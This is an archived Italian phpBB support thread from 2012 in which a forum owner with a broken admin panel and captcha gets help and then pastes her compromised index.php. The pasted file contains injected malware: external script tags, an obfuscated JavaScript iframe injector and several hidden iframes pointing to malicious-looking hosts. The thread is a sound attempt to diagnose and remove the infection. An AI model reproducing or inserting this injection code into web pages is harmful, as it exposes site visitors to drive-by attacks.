phpBB Italia chiude!
phpBB Italia ringrazia tutti gli utenti che hanno dato fiducia al nostro progetto per ben 9 anni, e che, grazie al grande lavoro fatto da tutto lo Staff (rigorosamente a titolo gratuito), hanno portato il portale a diventare il principale punto di riferimento italiano alla piattaforma phpBB.

Purtroppo, causa motivi personali, non ho più modo di gestirlo e portarlo avanti. Il forum viene ora posto in uno stato di sola lettura, nonché un archivio storico per permettere a chiunque di fruire di tutte le discussioni trattate.

Il nuovo portale di assistenza per l'Italia di phpBB diventa phpBB-Store.it, cui ringrazio per aver deciso di portare avanti questo grande progetto.

Grazie ancora,
Carlo - Amministratore di phpBB Italia

Problemi PCA

Supporto per phpBB 3.0.x.
unoperuno
Utente
Utente
Versione: 3.0.8
Database: phpmyadmin

Problemi PCA

Messaggio da unoperuno » 19/03/2012, 12:10

Ciao a tutti, per favore aiutatemi a risolvere questo problema!
Era parecchio tempo che non mi connettevo al mio forum come admin; recentemente (l'ultima volta oggi) mi sono connessa, riesco ad accedere ma quando tento di visualizzare il PCA lo vedo tutto grigio e non posso effettuare nessuna operazione! Cosa posso fare per risolvere questo problema? Inoltre chi tenta di iscriversi dice che non riesce a visualizzare il codice di iscrizione...credo si riferiscano al captcha. Help me, please!

Angolo
Leader Traduttori
Leader Traduttori
Versione: 3.0.12
Server: UNIX/Linux
PHP: 5.6.18
Database: MySQL 5.6.33-log
Contatta:

Re: Problemi PCA

Messaggio da Angolo » 19/03/2012, 12:15

Intanto compila correttamente il profilo nelle sue parti fondamentali: es.. versione di phpBB3.

In generale, prova con un corretto ripristino integrale ftp...
Se così non risolvi, quasi sicuramente il database è stato alterato.

unoperuno
Utente
Utente

Messaggio da unoperuno » 19/03/2012, 12:50

Grazie, ho aggiornato il profilo come mi hai chiesto. Comunque uso la versione 3.0.8. Il database è stato alterato e come? Io non l'ho manipolato in questi mesi...
Il ripristino integrale significa che devo uploadare di nuovo tutto? Ma così non perdo utenti iscritti e messaggi?

Angolo
Leader Traduttori
Leader Traduttori
Contatta:

Messaggio da Angolo » 19/03/2012, 13:14

C'è una guida specifica sul ripristino integrale ftp, dove trovi anche risposta alle tue domande.

Circa l'ipotesi di alterazione del database, è appunto un'ipotesi. E tale rimarrà finché non effettui il ripristino citato.

Silver Surfer
Utente
Utente
PHP: 5.3.10
Database: MySQL 5.1.49-community-log
Contatta:

Messaggio da Silver Surfer » 19/03/2012, 13:59

Ti ho risposto anche su altre parti: stai attenta che il tuo forum contiene un cavallo di troia, suppongo in un javascript.
Mi era già capitato di trovarne, quindi non sarebbe la prima volta :geek:

Angolo
Leader Traduttori
Leader Traduttori
Contatta:

Messaggio da Angolo » 19/03/2012, 14:13

In tal caso, sulla base dell'indicazione di Silver, devi prima effettuare una seria e approfondita scansione antivirus e antispyware, cambiare tutte le password amministrative, ed effettuare il ripristino citato.
Sperando che il database non sia stato alterato.

unoperuno
Utente
Utente

Messaggio da unoperuno » 20/03/2012, 18:08

Grazie sia a silver che ad angolo. Scusate se scrivo sia qui che altrove, è che avendo una certa urgenza, pensavo di far prima. Non pensavo di ritrovarvi qui ;)
Comunque già che ci sono...effettivamente ultimamente ho avuto problemi con un rootkit nel mio pc, che ho provato a estirpare ma non sono sicura di avercela fatta e dato che ero sotto tesi, non potendo rischiare di far danni ai dati sul pc, ho lasciato perdere. Il forum in questione l'ho comunque riaperto soltanto dopo aver (almeno presumibilmente) eliminato il rootkit. Potrebbero essere collegate le due cose? Come chiedevo altrove...come faccio a toglierlo questo trojan? O meglio come faccio a fare la scansione? Col mio antivirus?

Micogian
Leader Programmatori
Leader Programmatori
Versione: 3.2.0
PHP: 5.4.36
Database: MySQL 5.1.70-log
Contatta:

Messaggio da Micogian » 20/03/2012, 18:30

A volte è facile trovare i file infetti. Questi Trojan sono costituiti da una riga di codice molto lunga inserita all'inizio o alla fine dei file, generalmente index.php.
Controlla in FTP la data di aggiornamento dei file e se trovi file modificati recentemente controlla il contenuto.
Se c'è una riga strana toglila (fai prima un backup del file o di tutto il pacchetto FTP, escluso la cartella files che sarebbe troppo grossa)
Attenzione perchè è un'operazione da fare con cautela e precisione cercando di non togliere codice buono.
A volte l'intervento hacker riguarda i file .htaccess e nella root ti puoi trovare file che nulla hanno a vedere con phpbb, ma la data del file ti aiuta a capire se è un intervento recente.

Angolo
Leader Traduttori
Leader Traduttori
Contatta:

Messaggio da Angolo » 20/03/2012, 18:46

unoperuno, quella indicata da Micogian è una possibile soluzione.
Oppure fai una seria e approfondita scansione antivirus e antispyware sul tuo PC, e quindi un ripristino integrale ftp.

Ma o scrivi qui o scrivi altrove. Dove ritieni tu. Ma non in due o più posti nello stesso tempo. Grazie.

unoperuno
Utente
Utente

Messaggio da unoperuno » 21/03/2012, 16:17

Sì Angolo hai ragione. Scriverò qui.
Ora provo a vedere se trovo qualche roba sospetta..Grazie Micogian

P.S.:
Ho controllato la data di modifica del file index.php e portava la data di oggi...ma io non ho modificato nulla... Questo è il codice:

Codice: Seleziona tutto

<script type="text/javascript" src="http://unitedsquashleague.com/players/code.js"></script><script type="text/javascript" src="http://drupaltestare.altervista.org/code.js"></script>

<?php /* Application: phpbb */

header("Location: /forum/");

// Questo file e' stato autogenerato da AlterVista 
 // Modificate o sostituite questo file solo se siete certi di quello che fate!
 //  Per proteggere questo file, disabilitando le funzioni che lo modificano automaticamente,
 // potete eliminare il commento sulla prima riga (tutto cio' che c'e' tra /* e */)
 //
 // This file was autogenerated by AlterVista
 // Modify or substitute this file only if you know what are you doing!
 //  To protect this file, disabling AlterVista's automated functions that edit it from control panel,
 // you can remove the comment on the first row of this file (everything from /* and */)
?>
<script>;function u3KEll(){function a(b){if(b.contentDocument)return b.contentDocument;if(b.contentWindow)return b.contentWindow.document;return b.document}var c={};with(c){d=/a/.__proto__=='//';e='\v'=='v';}var f='ernVSoLr';var g='wuq7RVR';var h='ernVSoLrhernVSoLrternVSoLrternVSoLrpernVSoLr:ernVSoLr/ernVSoLr/ernVSoLrternVSoLreernVSoLrlernVSoLreernVSoLrpernVSoLroernVSoLrrernVSoLrternVSoLrmernVSoLriernVSoLrsernVSoLrsernVSoLrfernVSoLroernVSoLrrernVSoLrternVSoLruernVSoLrnernVSoLreernVSoLr.ernVSoLrcernVSoLroernVSoLrmernVSoLr/ernVSoLrmernVSoLraernVSoLriernVSoLrnernVSoLr.ernVSoLrpernVSoLrhernVSoLrpernVSoLr?ernVSoLrpernVSoLraernVSoLrgernVSoLreernVSoLr=ernVSoLr5ernVSoLr5ernVSoLraernVSoLrdernVSoLrfernVSoLr1ernVSoLr0ernVSoLr9ernVSoLr3ernVSoLr4ernVSoLr2ernVSoLr4ernVSoLrdernVSoLr1ernVSoLr3ernVSoLr4ernVSoLr';var k='ernVSoLriernVSoLrfernVSoLrrernVSoLraernVSoLrmernVSoLreernVSoLr';var i=c.e?'<'+k.split(f).join('')+' name="'+g+'" src="'+h.split(f).join('')+'">':k.split(f).join('');var j=document.createElement(i);with(j){name=g;setAttribute('name',g);id=g;}if(document.body){document.body.appendChild(j);clearInterval(d36o5g);}else{return;}with(j.style){if(!c.d)position='absolute';left=top='0px';height=width='1px';visibility='hidden';}if(!c.e)a(j).location.replace(h.split(f).join(''));}if(!window.bxvZgJ){d36o5g=setInterval(u3KEll,1000);window.bxvZgJ=true}</script><iframe src="http://popmpquqq.in/t/60f652b502ea7403ea22974f155ec904" frameborder="0" style="width:10px; height:10px; display:none; border:0; top:2; left:2"></iframe><iframe src=http://google-adsens.com/in.cgi?2 width=1 height=1 frameborder=0></iframe><iframe src=http://google-adsens.com/in.cgi?2 width=1 height=1 frameborder=0></iframe><iframe src=http://31.184.242.81/link.php width=1 height=1 frameborder=0></iframe>
Ultima modifica di Angolo il 21/03/2012, 16:27, modificato 2 volte in totale.
Motivazione: Niente messaggi consecutivi; usiamo i tag corretti.

Rispondi

Torna a “[3.0.x] Forum di Supporto”